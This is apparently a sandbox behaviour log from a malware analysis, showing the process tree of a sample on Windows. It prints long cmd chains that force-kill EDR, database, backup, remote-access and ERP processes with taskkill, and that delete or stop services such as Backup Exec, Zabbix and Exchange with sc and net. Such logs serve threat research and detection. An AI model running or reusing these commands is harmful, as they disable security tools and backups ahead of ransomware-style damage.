      cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T & whoami"
      4⤵
      PID:2328
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mysqld.exe /F
        5⤵
        
        PID:2940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TeamViewer_Service.exe /F
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:340
      - C:\Windows\system32\cmd.exe
        
        cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
        6⤵
        
        PID:1248
        
        C:\Windows\system32\sc.exe
        
        sc delete OracleRemExecService
        7⤵
        
        PID:2752
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSStorageSvr
        7⤵
        
        PID:1288
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSMediaSvr
        7⤵
        
        PID:2084
        
        C:\Windows\system32\sc.exe
        
        sc delete BackupExecAgentAccelerator
        7⤵
        
        PID:2632
        
        C:\Windows\system32\sc.exe
        
        sc delete BackupExecManagementService
        7⤵
        
        PID:2544
        
        C:\Windows\system32\sc.exe
        
        sc delete MDM
        7⤵
        
        PID:864
        
        C:\Windows\system32\sc.exe
        
        sc delete BackupExecJobEngine
        7⤵
        
        PID:2724
        
        C:\Windows\system32\sc.exe
        
        sc delete TxQBService
        7⤵
        
        PID:2504
        
        C:\Windows\system32\sc.exe
        
        sc delete BackupExecAgentBrowser
        7⤵
        
        PID:2988
        
        C:\Windows\system32\sc.exe
        
        sc delete Gailun_Downloader
        7⤵
        
        PID:2192
        
        C:\Windows\system32\sc.exe
        
        sc delete BackupExecRPCService
        7⤵
        
        PID:2052
        
        C:\Windows\system32\sc.exe
        
        sc delete BackupExecDeviceMediaService
        7⤵
        
        PID:2504
        
        C:\Windows\system32\sc.exe
        
        sc delete RemoteAssistService
        7⤵
        
        PID:2988
        
        C:\Windows\system32\sc.exe
        
        sc delete bedbg
        7⤵
        
        PID:2380
        
        C:\Windows\system32\sc.exe
        
        sc delete YunService
        7⤵
        
        PID:2952
        
        C:\Windows\system32\sc.exe
        
        sc delete "Zabbix Agent"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
        
        C:\Windows\system32\sc.exe
        
        sc delete Serv-U
        7⤵
        
        PID:2116
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop U8GCService
        8⤵
        
        PID:2748
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSFtpd
        7⤵
        
        PID:2372
        
        C:\Windows\system32\sc.exe
        
        sc delete "EasyFZS Server"
        7⤵
        
        PID:2780
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSMysqld
        7⤵
        
        PID:780
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSTomcat6
        7⤵
        
        PID:2092
        
        C:\Windows\system32\sc.exe
        
        sc delete "Rpc Monitor"
        7⤵
        
        PID:780
        
        C:\Windows\system32\sc.exe
        
        sc delete "Nuo Update Monitor"
        7⤵
        
        PID:2416
        
        C:\Windows\system32\sc.exe
        
        sc delete "Daemon Service"
        7⤵
        
        PID:2272
        
        C:\Windows\system32\sc.exe
        
        sc delete OpenFastAssist
        7⤵
        
        PID:2768
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSLoginSvr
        7⤵
        
        PID:1200
        
        C:\Windows\system32\sc.exe
        
        sc delete asComSvc
        7⤵
        
        PID:2876
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSGatewaySvr
        7⤵
        
        PID:2620
        
        C:\Windows\system32\sc.exe
        
        sc delete OfficeUpdateService
        7⤵
        
        PID:2968
        
        C:\Windows\system32\sc.exe
        
        sc delete RTCASMCU
        7⤵
        
        PID:2168
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSExchangeIMAP4BE
        8⤵
        
        PID:1468
        
        C:\Windows\system32\sc.exe
        
        sc delete RtcSrv
        7⤵
        
        PID:864
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSDataProcSvr
        7⤵
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc delete FTA
        7⤵
        
        PID:2920
        
        C:\Windows\system32\sc.exe
        
        sc delete MASTER
        7⤵
        
        PID:324
        
        C:\Windows\system32\sc.exe
        
        sc delete NscAuthService
        7⤵
        
        PID:2792
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop TPlusStdTaskService1300
        8⤵
        
        PID:2564
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSDownSvr
        7⤵
        
        PID:2832
        
        C:\Windows\system32\sc.exe
        
        sc delete MSCRMUnzipService
        7⤵
        
        PID:2292
        
        C:\Windows\system32\sc.exe
        
        sc delete MSCRMAsyncService$maintenance
        7⤵
        
        PID:2592
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSUserSvr
        7⤵
        
        PID:2968
        
        C:\Windows\system32\sc.exe
        
        sc delete GPSDaemon
        7⤵
        
        PID:2632
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM VBoxSDS.exe /F
        5⤵
        
        PID:2692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TeamViewer.exe /F
        5⤵
        
        PID:2728
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CasLicenceServer.exe /F
        5⤵
        Kills process with taskkill
        
        PID:3000
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM tv_w32.exe /F
        5⤵
        
        PID:1796
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM tv_x64.exe /F
        5⤵
        
        PID:1468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM rdm.exe /F
        5⤵
        
        PID:936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SecureCRT.exe /F
        5⤵
        
        PID:940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SecureCRTPortable.exe /F
        5⤵
        
        PID:2140
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM VirtualBox.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1584
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM VBoxSVC.exe /F
        5⤵
        
        PID:1964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM VirtualBoxVM.exe /F
        5⤵
        
        PID:2460
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM abs_deployer.exe /F
        5⤵
        
        PID:2016
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM edr_monitor.exe /F
        5⤵
        
        PID:1664
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sfupdatemgr.exe /F
        5⤵
        
        PID:2864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ipc_proxy.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1640
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM edr_agent.exe /F
        5⤵
        
        PID:2372
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM edr_sec_plan.exe /F
        5⤵
        
        PID:2356
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sfavsvc.exe /F
        5⤵
        
        PID:1380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
        5⤵
        
        PID:2416
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM DataShareBox.ShareBoxService.exe /F
        5⤵
        
        PID:1596
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Jointsky.CloudExchangeService.exe /F
        5⤵
        
        PID:2912
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
        5⤵
        
        PID:2388
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM perl.exe /F
        5⤵
        
        PID:900
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM java.exe /F
        5⤵
        
        PID:1828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM emagent.exe /F
        5⤵
        
        PID:2784
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TsServer.exe /F
        5⤵
        
        PID:3028
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AppMain.exe /F
        5⤵
        
        PID:2940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM easservice.exe /F
        5⤵
        
        PID:2244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kingdee6.1.exe /F
        5⤵
        
        PID:1664
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM QyKernel.exe /F
        5⤵
        
        PID:1468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM QyFragment.exe /F
        5⤵
        
        PID:1624
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UserClient.exe /F
        5⤵
        
        PID:1264
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNCEFExternal.exe /F
        5⤵
        
        PID:2128
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNCEFExternal.exe /F
        5⤵
        
        PID:1680
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNCEFExternal.exe /F
        5⤵
        
        PID:2432
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ComputerZTray.exe /F
        5⤵
        
        PID:1380
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ComputerZService.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ClearCache.exe /F
        5⤵
        
        PID:2308
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ProLiantMonitor.exe /F
        5⤵
        
        PID:2780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ChsIME.exe /F
        5⤵
        
        PID:2756
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM bugreport.exe /F
        5⤵
        
        PID:2876
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNWebServer.exe /F
        5⤵
        
        PID:2852
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UI0Detect.exe /F
        5⤵
        
        PID:2564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNCore.exe /F
        5⤵
        
        PID:2468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM gnwayDDNS.exe /F
        5⤵
        
        PID:1592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM GNWebHelper.exe /F
        5⤵
        
        PID:2592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM php-cgi.exe /F
        5⤵
        
        PID:2848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ESLUSBService.exe /F
        5⤵
        
        PID:2780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CQA.exe /F
        5⤵
        
        PID:2072
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kekcoek.pif /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Tinuknx.exe /F
        5⤵
        
        PID:2892
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM servers.exe /F
        5⤵
        
        PID:1560
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ping.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2468
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TianHeng.exe /F
        5⤵
        Kills process with taskkill
        
        PID:3060
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM K3MobileService.exe /F
        5⤵
        
        PID:1932
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM VSSVC.exe /F
        5⤵
        
        PID:1656
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Xshell.exe /F
        5⤵
        
        PID:2784
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM XshellCore.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM FNPLicensingService.exe /F
        5⤵
        
        PID:1288
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM XYNTService.exe /F
        5⤵
        
        PID:1056
  - - C:\Windows\system32\cmd.exe
      cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"
      4⤵
      PID:2076
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM rcrelay.exe /F
        5⤵
        
        PID:2988
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SogouImeBroker.exe /F
        5⤵
        
        PID:2848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM CCenter.exe /F
        5⤵
        
        PID:2396
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ScanFrm.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM d_manage.exe /F
        5⤵
        
        PID:2960
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RsTray.exe /F
        5⤵
        
        PID:2532
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM wampmanager.exe /F
        5⤵
        
        PID:1632
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM RavTray.exe /F
        5⤵
        
        PID:2064
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM mssearch.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM sqlmangr.exe /F
        5⤵
        
        PID:2780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM msftesql.exe /F
        5⤵
        
        PID:2848
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SyncBaseSvr.exe /F
        5⤵
        
        PID:780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM oracle.exe /F
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM TNSLSNR.exe /F
        5⤵
        
        PID:2636
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM SyncBaseConsole.exe /F
        5⤵
        
        PID:2996
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM aspnet_state.exe /F
        5⤵
        
        PID:3008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AutoBackUpEx.exe /F
        5⤵
        
        PID:2936
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM redis-server.exe /F
        5⤵
        
        PID:1108
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MySQLNotifier.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2620
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM oravssw.exe /F
        5⤵
        
        PID:2236
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM fppdis5.exe /F
        5⤵
        
        PID:564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM His6Service.exe /F
        5⤵
        
        PID:2592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM dinotify.exe /F
        5⤵
        
        PID:2296
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM JhTask.exe /F
        5⤵
        
        PID:780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Executer.exe /F
        5⤵
        
        PID:1232
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AllPassCBHost.exe /F
        5⤵
        
        PID:268
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ap_nginx.exe /F
        5⤵
        
        PID:2056
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AndroidServer.exe /F
        5⤵
        
        PID:2252
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM XT.exe /F
        5⤵
        
        PID:2704
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM XTService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:1200
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AllPassMCService.exe /F
        5⤵
        
        PID:2748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM IMEDICTUPDATE.exe /F
        5⤵
        
        PID:2392
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM FlashHelperService.exe /F
        5⤵
        
        PID:2404
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM ap_redis-server.exe /F
        5⤵
        
        PID:1968
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UtilDev.WebServer.Monitor.exe /F
        5⤵
        
        PID:2832
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM UWS.AppHost.Clr2.x86.exe /F
        5⤵
        
        PID:2540
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM FoxitProtect.exe /F
        5⤵
        
        PID:2072
